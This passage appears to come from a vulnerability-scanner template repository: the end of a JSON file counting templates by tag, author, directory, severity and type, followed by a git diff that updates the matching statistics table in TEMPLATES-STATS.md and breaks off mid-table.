},{"name":"smtp","count":3},{"name":"nosqli","count":3},{"name":"enumeration","count":2},{"name":"dolibarr","count":2},{"name":"geowebserver","count":2},{"name":"glassfish","count":2},{"name":"waf","count":2},{"name":"flir","count":2},{"name":"ecology","count":2},{"name":"kong","count":2},{"name":"bypass","count":2},{"name":"chamilo","count":2},{"name":"cache","count":2},{"name":"hostheader-injection","count":2},{"name":"openvpn","count":2},{"name":"icewarp","count":2},{"name":"shellshock","count":2},{"name":"cve2005","count":2},{"name":"trixbox","count":2},{"name":"axis","count":2},{"name":"horde","count":2},{"name":"openfire","count":2},{"name":"nagios","count":2},{"name":"huawei","count":2},{"name":"mcafee","count":2},{"name":"prestashop","count":2},{"name":"sharepoint","count":2},{"name":"qcubed","count":2},{"name":"rockmongo","count":2},{"name":"service","count":2},{"name":"axis2","count":2},{"name":"activemq","count":2},{"name":"jboss","count":2},{"name":"mida","count":2},{"name":"idrac","count":2},{"name":"wuzhicms","count":2},{"name":"cve2007","count":2},{"name":"phpcollab","count":2},{"name":"grav","count":2},{"name":"github","count":2},{"name":"nextjs","count":2},{"name":"couchdb","count":2},{"name":"node","count":2},{"name":"natshell","count":2},{"name":"avantfax","count":2},{"name":"sonicwall","count":2},{"name":"backdoor","count":2},{"name":"sitecore","count":2},{"name":"status","count":2},{"name":"db","count":2},{"name":"adminer","count":2},{"name":"plesk","count":2},{"name":"leak","count":2},{"name":"minio","count":2},{"name":"yapi","count":2},{"name":"rstudio","count":2},{"name":"nextcloud","count":2},{"name":"prtg","count":2},{"name":"akkadian","count":2},{"name":"sonarqube","count":2},{"name":"aruba","count":2},{"name":"jeedom","count":2},{"name":"oauth","count":2},{"name":"ilo","count":2},{"name":"seeyon","count":2},{"name":"commax","count":2},{"name":"splunk","count":2},{"name":"storage","count":2},{"name":"fortios","count":2},{"name":"favicon","count":2},{"name":"frp","count":2},{"name":"bucket","count":2},{"name":"hpe","count":2},{"name":"bruteforce","count":2},{"name":"getsimple","count":2},{"name":"igs","count":2},{"name":"dos","count":2},{"name":"linux","count":2},{"name":"yii","count":2},{"name":"ucmdb","count":2},{"name":"odoo","count":2},{"name":"liferay","count":2},{"name":"xxljob","count":2},{"name":"vrealize","count":2},{"name":"akamai","count":2},{"name":"guacamole","count":2},{"name":"jsf","count":2},{"name":"maian","count":2},{"name":"totemomail","count":2},{"name":"smb","count":2},{"name":"showdoc","count":2},{"name":"hashicorp","count":2},{"name":"chiyu","count":2},{"name":"netis","count":2},{"name":"pega","count":2},{"name":"emerge","count":2},{"name":"harbor","count":2},{"name":"webcam","count":2},{"name":"voipmonitor","count":2},{"name":"kentico","count":2},{"name":"hjtcloud","count":2},{"name":"netsweeper","count":2},{"name":"ec2","count":2},{"name":"spark","count":2},{"name":"saltstack","count":2},{"name":"paloalto","count":2},{"name":"middleware","count":2},{"name":"hasura","count":2},{"name":"azure","count":2},{"name":"keycloak","count":2},{"name":"ecoa","count":2},{"name":"globalprotect","count":2},{"name":"wordfence","count":2},{"name":"apos","count":1},{"name":"sgp","count":1},{"name":"oneblog","count":1},{"name":"exposures","count":1},{"name":"expressjs","count":1},{"name":"feifeicms","count":1},{"name":"clickhouse","count":1},{"name":"tidb","count":1},{"name":"chyrp","count":1},{"name":"mautic","count":1},{"name":"nimble","count":1},{"name":"realteo","count":1},{"name":"parentlink","count":1},{"name":"metinfo","count":1},{"name":"sureline","count":1},{"name":"pmb","count":1},{"name":"pulsesecure","count":1},{"name":"zookeeper","count":1},{"name":"imap","count":1},{"name":" default-login","count":1},{"name":"jnoj","count":1},{"name":"smartblog","count":1},{"name":"rujjie","count":1},{"name":"tpshop","count":1},{"name":"episerver","count":1},{"name":"lanproxy","count":1},{"name":"ricoh","count":1},{"name":"duomicms","count":1},{"name":"k8s","count":1},{"name":"actuator","count":1},{"name":"servicedesk","count":1},{"name":"tieline","count":1},{"name":"graphql","count":1},{"name":"emby","count":1},{"name":"razor","count":1},{"name":"seacms","count":1},{"name":"whm","count":1},{"name":"livezilla","count":1},{"name":"fuelcms","count":1},{"name":"ruby","count":1},{"name":"totaljs","count":1},{"name":"huijietong","count":1},{"name":"cofax","count":1},{"name":"lansweeper","count":1},{"name":"webmin","count":1},{"name":"openemr","count":1},{"name":"weiphp","count":1},{"name":"rmi","count":1},{"name":"goahead","count":1},{"name":"grails","count":1},{"name":"owasp","count":1},{"name":"daybyday","count":1},{"name":"crm","count":1},{"name":"starttls","count":1},{"name":"shoppable","count":1},{"name":"appweb","count":1},{"name":"testrail","count":1},{"name":"mailchimp","count":1},{"name":"pyramid","count":1},{"name":"eyelock","count":1},{"name":"centreon","count":1},{"name":"nifi","count":1},{"name":"postmessage","count":1},{"name":"darkstat","count":1},{"name":"vnc","count":1},{"name":"proftpd","count":1},{"name":"rockethchat","count":1},{"name":"spring","count":1},{"name":"geutebruck","count":1},{"name":"gsoap","count":1},{"name":"magicflow","count":1},{"name":"powercreator","count":1},{"name":"xdcms","count":1},{"name":"shopxo","count":1},{"name":"minimouse","count":1},{"name":"servicenow","count":1},{"name":"discourse","count":1},{"name":"xml","count":1},{"name":"jaspersoft","count":1},{"name":"jmx","count":1},{"name":"ssltls","count":1},{"name":"pcoip","count":1},{"name":"sprintful","count":1},{"name":"cors","count":1},{"name":"expose","count":1},{"name":"listserv","count":1},{"name":"spectracom","count":1},{"name":"elasticsearch","count":1},{"name":"rmc","count":1},{"name":"cse","count":1},{"name":"myvuehelp","count":1},{"name":"selea","count":1},{"name":"upnp","count":1},{"name":"k8","count":1},{"name":"nweb2fax","count":1},{"name":"faraday","count":1},{"name":"skywalking","count":1},{"name":"lotuscms","count":1},{"name":"zcms","count":1},{"name":"nsasg","count":1},{"name":"dom","count":1},{"name":"motorola","count":1},{"name":"acontent","count":1},{"name":"openerp","count":1},{"name":"avtech","count":1},{"name":"opm","count":1},{"name":"mrtg","count":1},{"name":"javafaces","count":1},{"name":"sage","count":1},{"name":"gotmls","count":1},{"name":"ns","count":1},{"name":"cscart","count":1},{"name":"blackboard","count":1},{"name":"owa","count":1},{"name":"tor","count":1},{"name":"emc","count":1},{"name":"sangfor","count":1},{"name":"clockwatch","count":1},{"name":"bash","count":1},{"name":"rabbitmq","count":1},{"name":"bazarr","count":1},{"name":"spf","count":1},{"name":"dotclear","count":1},{"name":"cyberoam","count":1},{"name":"subrion","count":1},{"name":"mantisbt","count":1},{"name":"cloudinary","count":1},{"name":"geddy","count":1},{"name":"metabase","count":1},{"name":"gateone","count":1},{"name":"sentry","count":1},{"name":"pippoint","count":1},{"name":"portainer","count":1},{"name":"hiawatha","count":1},{"name":"natemail","count":1},{"name":"trane","count":1},{"name":"hadoop","count":1},{"name":"floc","count":1},{"name":"bigbluebutton","count":1},{"name":"octoprint","count":1},{"name":"wavlink","count":1},{"name":"netdata","count":1},{"name":"doh","count":1},{"name":"beanshell","count":1},{"name":"eprints","count":1},{"name":"xmlchart","count":1},{"name":"lancom","count":1},{"name":"avalanche","count":1},{"name":"arl","count":1},{"name":"mongoshake","count":1},{"name":"email","count":1},{"name":"wildfly","count":1},{"name":"olivetti","count":1},{"name":"smartsense","count":1},{"name":"tongda","count":1},{"name":"qsan","count":1},{"name":"dvr","count":1},{"name":"nexusdb","count":1},{"name":"fortigate","count":1},{"name":"tcexam","count":1},{"name":"exponentcms","count":1},{"name":"landrayoa","count":1},{"name":"redhat","count":1},{"name":"webmodule-ee","count":1},{"name":"database","count":1},{"name":"kafdrop","count":1},{"name":"cve2006","count":1},{"name":"moin","count":1},{"name":"bullwark","count":1},{"name":"trilithic","count":1},{"name":"rsyncd","count":1},{"name":"wooyun","count":1},{"name":"asus","count":1},{"name":"jeewms","count":1},{"name":"wing-ftp","count":1},{"name":"zarafa","count":1},{"name":"krweb","count":1},{"name":"nordex","count":1},{"name":"zms","count":1},{"name":"dotnet","count":1},{"name":"azkaban","count":1},{"name":"svnserve","count":1},{"name":"haproxy","count":1},{"name":"openrestry","count":1},{"name":"pihole","count":1},{"name":"cloudflare","count":1},{"name":"sar2html","count":1},{"name":"oscommerce","count":1},{"name":"fortinet","count":1},{"name":"plugin","count":1},{"name":"h3c-imc","count":1},{"name":"sarg","count":1},{"name":"lutron","count":1},{"name":"cgi","count":1},{"name":"opensns","count":1},{"name":"solman","count":1},{"name":"webui","count":1},{"name":"spip","count":1},{"name":"fastapi","count":1},{"name":"jenkin","count":1},{"name":"tika","count":1},{"name":"office365","count":1},{"name":"gloo","count":1},{"name":"karel","count":1},{"name":"alibaba","count":1},{"name":"auth","count":1},{"name":"yealink","count":1},{"name":"etherpad","count":1},{"name":"saltapi","count":1},{"name":"heroku","count":1},{"name":"bookstack","count":1},{"name":"redmine","count":1},{"name":"apiman","count":1},{"name":"tracer","count":1},{"name":"tileserver","count":1},{"name":"embedthis","count":1},{"name":"sceditor","count":1},{"name":"javascript","count":1},{"name":"traefik","count":1},{"name":"iceflow","count":1},{"name":"biometrics","count":1},{"name":"springframework","count":1},{"name":"sql","count":1},{"name":"oidc","count":1},{"name":"jsp","count":1},{"name":"kyan","count":1},{"name":"adb","count":1},{"name":"webftp","count":1},{"name":"phpinfo","count":1},{"name":"clusterengine","count":1},{"name":"argussurveillance","count":1},{"name":"cherokee","count":1},{"name":"discord","count":1},{"name":"werkzeug","count":1},{"name":"exacqvision","count":1},{"name":"alerta","count":1},{"name":"wazuh","count":1},{"name":"froxlor","count":1},{"name":"clink-office","count":1},{"name":"wondercms","count":1},{"name":"centos","count":1},{"name":"codeigniter","count":1},{"name":"memcached","count":1},{"name":"lotus","count":1},{"name":"svn","count":1},{"name":"clave","count":1},{"name":"idemia","count":1},{"name":"chinaunicom","count":1},{"name":"moinmoin","count":1},{"name":"thinkadmin","count":1},{"name":"vidyo","count":1},{"name":"beanstalk","count":1},{"name":"redis","count":1},{"name":"aura","count":1},{"name":"mantis","count":1},{"name":"twitter-server","count":1},{"name":"websphere","count":1},{"name":"luftguitar","count":1},{"name":"viewlinc","count":1},{"name":"announcekit","count":1},{"name":"qdpm","count":1},{"name":"timesheet","count":1},{"name":"fastcgi","count":1},{"name":"yachtcontrol","count":1},{"name":"anchorcms","count":1},{"name":"terraform","count":1},{"name":"node-red-dashboard","count":1},{"name":"aspnuke","count":1},{"name":"acme","count":1},{"name":"xampp","count":1},{"name":"ems","count":1},{"name":"camunda","count":1},{"name":"szhe","count":1},{"name":"sophos","count":1},{"name":"vsphere","count":1},{"name":"htmli","count":1},{"name":"nps","count":1},{"name":"cerebro","count":1},{"name":"rocketchat","count":1},{"name":"phpunit","count":1},{"name":"hiboss","count":1},{"name":"vcenter","count":1},{"name":"mediumish","count":1},{"name":"openstack","count":1},{"name":"ewebs","count":1},{"name":"netgenie","count":1},{"name":"extractor","count":1},{"name":"elfinder","count":1},{"name":"glowroot","count":1},{"name":"blue-ocean","count":1},{"name":"synnefo","count":1},{"name":"uwsgi","count":1},{"name":"accela","count":1},{"name":"phpfastcache","count":1},{"name":"payara","count":1},{"name":"opensmtpd","count":1},{"name":"pacsone","count":1},{"name":"hortonworks","count":1},{"name":"mpsec","count":1},{"name":"spidercontrol","count":1},{"name":"gstorage","count":1},{"name":"kerbynet","count":1},{"name":"frontpage","count":1},{"name":"salesforce","count":1},{"name":"addpac","count":1},{"name":"vsftpd","count":1},{"name":"openx","count":1},{"name":"landray","count":1},{"name":"ulterius","count":1},{"name":"panasonic","count":1},{"name":"blind","count":1},{"name":"mobileiron","count":1},{"name":"fiori","count":1},{"name":"webadmin","count":1},{"name":"dbeaver","count":1},{"name":"basic-auth","count":1},{"name":"meraki","count":1},{"name":"csod","count":1},{"name":"tenda","count":1},{"name":"circontrorl","count":1},{"name":"jfrog","count":1},{"name":"etouch","count":1},{"name":"stem","count":1},{"name":"tensorboard","count":1},{"name":"plastic","count":1},{"name":"artica","count":1},{"name":"resourcespace","count":1},{"name":"klog","count":1},{"name":"wmt","count":1},{"name":"logontracer","count":1},{"name":"netmask","count":1},{"name":"gridx","count":1},{"name":"shoretel","count":1},{"name":"nette","count":1},{"name":"elascticsearch","count":1},{"name":"varnish","count":1},{"name":"wamp","count":1},{"name":"maxsite","count":1},{"name":"comodo","count":1},{"name":"javamelody","count":1},{"name":"nomad","count":1},{"name":"cobub","count":1},{"name":"flink","count":1},{"name":"mongo","count":1},{"name":"finereport","count":1},{"name":"panos","count":1},{"name":"influxdb","count":1},{"name":"sidekiq","count":1},{"name":"monitorr","count":1},{"name":"fortilogger","count":1},{"name":"tamronos","count":1},{"name":"commscope","count":1},{"name":"graylog","count":1},{"name":"opencast","count":1},{"name":"pgadmin","count":1},{"name":"calendarix","count":1},{"name":"websvn","count":1},{"name":"bedita","count":1},{"name":"smi","count":1},{"name":"drone","count":1},{"name":"monitorix","count":1},{"name":"fortigates","count":1},{"name":"sqlite","count":1},{"name":"burp","count":1},{"name":"pagespeed","count":1},{"name":"ntopng","count":1},{"name":"erp-nc","count":1},{"name":"primetek","count":1},{"name":"phpwiki","count":1},{"name":"ognl","count":1},{"name":"octobercms","count":1},{"name":"scs","count":1},{"name":"zyxel","count":1},{"name":"lighttpd","count":1},{"name":"nc2","count":1},{"name":"omi","count":1},{"name":"couchbase","count":1},{"name":"mara","count":1},{"name":"postgres","count":1},{"name":"craftcms","count":1},{"name":"achecker","count":1},{"name":"plc","count":1},{"name":"domxss","count":1},{"name":"kubeflow","count":1},{"name":"jquery","count":1},{"name":"zenario","count":1},{"name":"empirecms","count":1},{"name":"maccmsv10","count":1},{"name":"robomongo","count":1},{"name":"xiuno","count":1},{"name":"fedora","count":1},{"name":"ioncube","count":1},{"name":"wifisky","count":1},{"name":"ssl","count":1},{"name":"redwood","count":1},{"name":"zeroshell","count":1},{"name":"lg-nas","count":1},{"name":"woocommerce","count":1},{"name":"turbocrm","count":1},{"name":"zend","count":1},{"name":"dompdf","count":1},{"name":"scimono","count":1},{"name":"codemeter","count":1},{"name":"shiro","count":1},{"name":"gitea","count":1},{"name":"gunicorn","count":1},{"name":"redcap","count":1},{"name":"74cms","count":1},{"name":"opentsdb","count":1},{"name":"interlib","count":1},{"name":"mirai","count":1},{"name":"visionhub","count":1},{"name":"qvisdvr","count":1},{"name":"gilacms","count":1},{"name":"nedi","count":1},{"name":"bolt","count":1},{"name":"solarlog","count":1},{"name":"ecom","count":1},{"name":"chevereto","count":1},{"name":"zm","count":1},{"name":"iptime","count":1},{"name":"concrete","count":1},{"name":"s3","count":1},{"name":"optiLink","count":1},{"name":"dotnetnuke","count":1},{"name":"checkpoint","count":1},{"name":"circontrol","count":1},{"name":"triconsole","count":1},{"name":"viewpoint","count":1},{"name":"phalcon","count":1},{"name":"xunchi","count":1},{"name":"vscode","count":1},{"name":"default","count":1},{"name":"kindeditor","count":1},{"name":"gespage","count":1},{"name":"ghost","count":1},{"name":"nuxeo","count":1},{"name":"diris","count":1},{"name":"mdb","count":1},{"name":"swagger","count":1},{"name":"soar","count":1},{"name":"visualtools","count":1},{"name":"ganglia","count":1},{"name":"keenetic","count":1},{"name":"miscrsoft","count":1},{"name":"st","count":1},{"name":"cockpit","count":1},{"name":"ruckus","count":1},{"name":"linksys","count":1},{"name":"okta","count":1},{"name":"jenzabar","count":1},{"name":"dnssec","count":1},{"name":"expn","count":1},{"name":"esmtp","count":1},{"name":"setup","count":1},{"name":"mysql","count":1},{"name":"timeclock","count":1},{"name":"tjws","count":1},{"name":"wavemaker","count":1},{"name":"processmaker","count":1},{"name":"shopizer","count":1},{"name":"acexy","count":1},{"name":"majordomo2","count":1},{"name":"eyou","count":1},{"name":"graphite","count":1},{"name":"mariadb","count":1},{"name":"gurock","count":1},{"name":"fortiweb","count":1},{"name":"csrf","count":1},{"name":"phpfusion","count":1},{"name":"jitsi","count":1},{"name":"myucms","count":1},{"name":"plone","count":1},{"name":"tectuus","count":1},{"name":"cocoon","count":1},{"name":"linkedin","count":1},{"name":"gitlist","count":1},{"name":"ilo4","count":1},{"name":"simplecrm","count":1},{"name":"wiki","count":1},{"name":"xvr","count":1},{"name":"sourcebans","count":1},{"name":"woocomernce","count":1},{"name":"alertmanager","count":1},{"name":"shopware","count":1},{"name":"socomec","count":1},{"name":"nuuo","count":1},{"name":"glances","count":1},{"name":"labtech","count":1},{"name":"api-manager","count":1},{"name":"sco","count":1},{"name":"zte","count":1},{"name":"rdp","count":1},{"name":"eg","count":1},{"name":"panabit","count":1},{"name":"clockwork","count":1},{"name":"rhymix","count":1},{"name":"bitly","count":1},{"name":"gogs","count":1},{"name":"upload","count":1},{"name":"zzzcms","count":1},{"name":"tapestry","count":1},{"name":"ambari","count":1},{"name":"tensorflow","count":1},{"name":"perl","count":1},{"name":"b2evolution","count":1},{"name":"rubedo","count":1},{"name":"ueditor","count":1},{"name":"zmanda","count":1},{"name":"dvwa","count":1},{"name":"netrc","count":1}],"authors":[{"name":"pikpikcu","count":273},{"name":"dhiyaneshdk","count":263},{"name":"daffainfo","count":216},{"name":"pdteam","count":196},{"name":"geeknik","count":153},{"name":"dwisiswant0","count":131},{"name":"gy741","count":75},{"name":"pussycat0x","count":68},{"name":"princechaddha","count":61},{"name":"madrobot","count":61},{"name":"0x_akoko","count":42},{"name":"gaurang","count":42},{"name":"philippedelteil","count":27},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":14},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"hackergautam","count":9},{"name":"nadino","count":9},{"name":"melbadry9","count":9},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"meme-lord","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"oppsec","count":7},{"name":"dogasantos","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"harshbothra_","count":7},{"name":"dr_set","count":7},{"name":"randomstr1ng","count":7},{"name":"puzzlepeaches","count":6},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"logicalhunter","count":6},{"name":"__fazal","count":6},{"name":"joanbono","count":5},{"name":"iamnoooob","count":5},{"name":"ganofins","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"rootxharsh","count":5},{"name":"elsfa7110","count":5},{"name":"github.com/its0x08","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"lu4nx","count":4},{"name":"xelkomy","count":4},{"name":"skeltavik","count":3},{"name":"binaryfigments","count":3},{"name":"impramodsargar","count":3},{"name":"shine","count":3},{"name":"dudez","count":3},{"name":"mavericknerd","count":3},{"name":"_generic_human_","count":3},{"name":"idealphase","count":3},{"name":"shifacyclewala","count":3},{"name":"0w4ys","count":3},{"name":"tess","count":3},{"name":"emenalf","count":3},{"name":"f1tz","count":3},{"name":"thomas_from_offensity","count":3},{"name":"unstabl3","count":3},{"name":"vsh00t","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"z3bd","count":3},{"name":"jarijaas","count":3},{"name":"sushantkamble","count":3},{"name":"johnk3r","count":3},{"name":"incogbyte","count":3},{"name":"fyoorer","count":3},{"name":"bing0o","count":2},{"name":"lotusdll","count":2},{"name":"bsysop","count":2},{"name":"x1m_martijn","count":2},{"name":"whoever","count":2},{"name":"huowuzhao","count":2},{"name":"alifathi-h1","count":2},{"name":"vavkamil","count":2},{"name":"ree4pwn","count":2},{"name":"0xelkomy","count":2},{"name":"0xprial","count":2},{"name":"gal nagli","count":2},{"name":"fabaff","count":2},{"name":"r3naissance","count":2},{"name":"swissky","count":2},{"name":"amsda","count":2},{"name":"g4l1t0","count":2},{"name":"bernardofsr","count":2},{"name":"0xsmiley","count":2},{"name":"foulenzer","count":2},{"name":"hetroublemakr","count":2},{"name":"udit_thakkur","count":2},{"name":"gevakun","count":2},{"name":"convisoappsec","count":2},{"name":"zomsop82","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"socketz","count":2},{"name":"mohammedsaneem","count":2},{"name":"manas_harsh","count":2},{"name":"kiblyn11","count":2},{"name":"joeldeleep","count":2},{"name":"0xrudra","count":2},{"name":"bp0lr","count":2},{"name":"parth","count":2},{"name":"davidmckennirey","count":2},{"name":"moritz nentwig","count":2},{"name":"johnjhacking","count":2},{"name":"cocxanh","count":2},{"name":"random-robbie","count":2},{"name":"afaq","count":2},{"name":"w4cky_","count":2},{"name":"pxmme1337","count":2},{"name":"0xsapra","count":2},{"name":"nkxxkn","count":2},{"name":"dheerajmadhukar","count":2},{"name":"0xcrypto","count":2},{"name":"ehsahil","count":2},{"name":"hahwul","count":2},{"name":"randomrobbie","count":2},{"name":"arcc","count":2},{"name":"koti2","count":2},{"name":"mass0ma","count":1},{"name":"brabbit10","count":1},{"name":"zandros0","count":1},{"name":"shifacyclewla","count":1},{"name":"sshell","count":1},{"name":"fopina","count":1},{"name":"sicksec","count":1},{"name":"bjhulst","count":1},{"name":"rotemreiss","count":1},{"name":"juicypotato1","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"evolutionsec","count":1},{"name":"jteles","count":1},{"name":"elder tao","count":1},{"name":"andirrahmani1","count":1},{"name":"jeya seelan","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"izn0u","count":1},{"name":"adrianmf","count":1},{"name":"me9187","count":1},{"name":"udyz","count":1},{"name":"dawid-czarnecki","count":1},{"name":"0xteles","count":1},{"name":"shelld3v","count":1},{"name":"rojanrijal","count":1},{"name":"alex","count":1},{"name":"thezakman","count":1},{"name":"smaranchand","count":1},{"name":"manuelbua","count":1},{"name":"affix","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"d0rkerdevil","count":1},{"name":"b0rn2r00t","count":1},{"name":"yavolo","count":1},{"name":"revblock","count":1},{"name":"_c0wb0y_","count":1},{"name":"c3l3si4n","count":1},{"name":"retr0","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"ahmetpergamum","count":1},{"name":"b4uh0lz","count":1},{"name":"52971","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sullo","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"streetofhackerr007","count":1},{"name":"fmunozs","count":1},{"name":"xstp","count":1},{"name":"_harleo","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"alperenkesk","count":1},{"name":"yashgoti","count":1},{"name":"tim_koopmans","count":1},{"name":"kre80r","count":1},{"name":"luskabol","count":1},{"name":"tirtha_mandal","count":1},{"name":"andysvints","count":1},{"name":"j33n1k4","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"omarkurt","count":1},{"name":"0xtavian","count":1},{"name":"remonsec","count":1},{"name":"qlkwej","count":1},{"name":"shreyapohekar","count":1},{"name":"pudsec","count":1},{"name":"chron0x","count":1},{"name":"x6263","count":1},{"name":"mubassirpatel","count":1},{"name":"kabirsuda","count":1},{"name":"thevillagehacker","count":1},{"name":"vzamanillo","count":1},{"name":"pratik khalane","count":1},{"name":"furkansenan","count":1},{"name":"borna nematzadeh","count":1},{"name":"its0x08","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"elmahdi","count":1},{"name":"mesaglio","count":1},{"name":"sickwell","count":1},{"name":"soyelmago","count":1},{"name":"yashanand155","count":1},{"name":"ldionmarcil","count":1},{"name":"schniggie","count":1},{"name":"ooooooo_q","count":1},{"name":"iampritam","count":1},{"name":"ilovebinbash","count":1},{"name":"bad5ect0r","count":1},{"name":"un-fmunozs","count":1},{"name":"naglinagli","count":1},{"name":"knassar702","count":1},{"name":"@dwisiswant0","count":1},{"name":"cookiehanhoan","count":1},{"name":"ohlinge","count":1},{"name":"luci","count":1},{"name":"pdp","count":1},{"name":"philippdelteil","count":1},{"name":"0ut0fb4nd","count":1},{"name":"noamrathaus","count":1},{"name":"s1r1u5_","count":1},{"name":"hakluke","count":1},{"name":"micha3lb3n","count":1},{"name":"deena","count":1},{"name":"hanlaomo","count":1},{"name":"_darrenmartyn","count":1},{"name":"absshax","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"ringo","count":1},{"name":"nerrorsec","count":1},{"name":"mhdsamx","count":1},{"name":"zhenwarx","count":1},{"name":"rodnt","count":1},{"name":"patralos","count":1},{"name":"undefl0w","count":1},{"name":"b0yd","count":1},{"name":"oscarintherocks","count":1},{"name":"berkdusunur","count":1},{"name":"whynotke","count":1},{"name":"akshansh","count":1},{"name":"aresx","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"apt-mirror","count":1},{"name":"daviey","count":1},{"name":"defr0ggy","count":1},{"name":"taielab","count":1},{"name":"blckraven","count":1},{"name":"mah3sec_","count":1},{"name":"gboddin","count":1},{"name":"akash.c","count":1},{"name":"infosecsanyam","count":1},{"name":"wabafet","count":1},{"name":"ahmed sherif","count":1},{"name":"willd96","count":1},{"name":"sy3omda","count":1},{"name":"regala_","count":1},{"name":"alph4byt3","count":1},{"name":"notsoevilweasel","count":1},{"name":"sec_hawk","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"push4d","count":1},{"name":"geraldino2","count":1},{"name":"th3.d1p4k","count":1},{"name":"0xrod","count":1},{"name":"kareemse1im","count":1},{"name":"intx0x80","count":1},{"name":"ipanda","count":1},{"name":"ajaysenr","count":1},{"name":"kurohost","count":1},{"name":"raesene","count":1},{"name":"nytr0gen","count":1},{"name":"becivells","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"toufik airane","count":1},{"name":"bolli95","count":1},{"name":"makyotox","count":1},{"name":"0h1in9e","count":1},{"name":"exploitation","count":1},{"name":"co0nan","count":1},{"name":"petruknisme","count":1},{"name":"divya_mudgal","count":1},{"name":"flag007","count":1}],"directory":[{"name":"cves","count":731},{"name":"vulnerabilities","count":307},{"name":"exposed-panels","count":250},{"name":"technologies","count":192},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":37},{"name":"network","count":33},{"name":"iot","count":25},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":650},{"name":"high","count":558},{"name":"medium","count":451},{"name":"critical","count":276},{"name":"low","count":153}],"types":[{"name":"http","count":1983},{"name":"file","count":46},{"name":"network","count":42},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 4db6036e00..36b33f7526 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,818 +1,823 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 725 | pikpikcu | 273 | cves | 725 | info | 643 | http | 1965 | -| lfi | 260 | dhiyaneshdk | 258 | vulnerabilities | 301 | high | 553 | file | 46 | -| panel | 248 | daffainfo | 213 | exposed-panels | 247 | medium | 448 | network | 41 | -| xss | 244 | pdteam | 195 | technologies | 191 | critical | 273 | dns | 12 | -| exposure | 231 | geeknik | 152 | exposures | 188 | low | 152 | | | -| wordpress | 223 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | -| rce | 198 | gy741 | 72 | takeovers | 64 | | | | | -| tech | 181 | pussycat0x | 67 | default-logins | 56 | | | | | +| cve | 731 | pikpikcu | 273 | cves | 731 | info | 650 | http | 1983 | +| lfi | 265 | dhiyaneshdk | 263 | vulnerabilities | 307 | high | 558 | file | 46 | +| panel | 252 | daffainfo | 216 | exposed-panels | 250 | medium | 451 | network | 42 | +| xss | 246 | pdteam | 196 | technologies | 192 | critical | 276 | dns | 12 | +| exposure | 233 | geeknik | 153 | exposures | 188 | low | 153 | | | +| wordpress | 229 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | +| rce | 199 | gy741 | 75 | takeovers | 64 | | | | | +| tech | 183 | pussycat0x | 68 | default-logins | 56 | | | | | | cve2020 | 164 | madrobot | 61 | file | 46 | | | | | -| wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | | -| cve2021 | 127 | gaurang | 42 | network | 32 | | | | | -| cve2019 | 96 | 0x_akoko | 39 | miscellaneous | 24 | | | | | -| config | 94 | ice3man | 26 | iot | 23 | | | | | -| cve2018 | 85 | philippedelteil | 25 | dns | 12 | | | | | +| wp-plugin | 155 | princechaddha | 61 | workflows | 37 | | | | | +| cve2021 | 130 | 0x_akoko | 42 | network | 33 | | | | | +| cve2019 | 96 | gaurang | 42 | iot | 25 | | | | | +| config | 94 | philippedelteil | 27 | miscellaneous | 24 | | | | | +| cve2018 | 86 | ice3man | 26 | dns | 12 | | | | | | joomla | 79 | organiccrap | 24 | fuzzing | 10 | | | | | | apache | 70 | sheikhrishad | 15 | cnvd | 9 | | | | | -| cve2010 | 69 | milo2012 | 14 | headless | 5 | | | | | -| takeover | 68 | pr3r00t | 14 | | | | | | | -| token | 65 | techbrunchfr | 13 | | | | | | | -| default-login | 63 | suman_kar | 12 | | | | | | | -| iot | 62 | r3dg33k | 11 | | | | | | | -| oob | 53 | cyllective | 11 | | | | | | | -| cve2017 | 50 | righettod | 10 | | | | | | | -| unauth | 47 | wdahlenb | 10 | | | | | | | +| cve2010 | 69 | pr3r00t | 14 | headless | 5 | | | | | +| takeover | 68 | milo2012 | 14 | | | | | | | +| iot | 66 | techbrunchfr | 13 | | | | | | | +| token | 65 | suman_kar | 12 | | | | | | | +| default-login | 63 | cyllective | 11 | | | | | | | +| oob | 55 | r3dg33k | 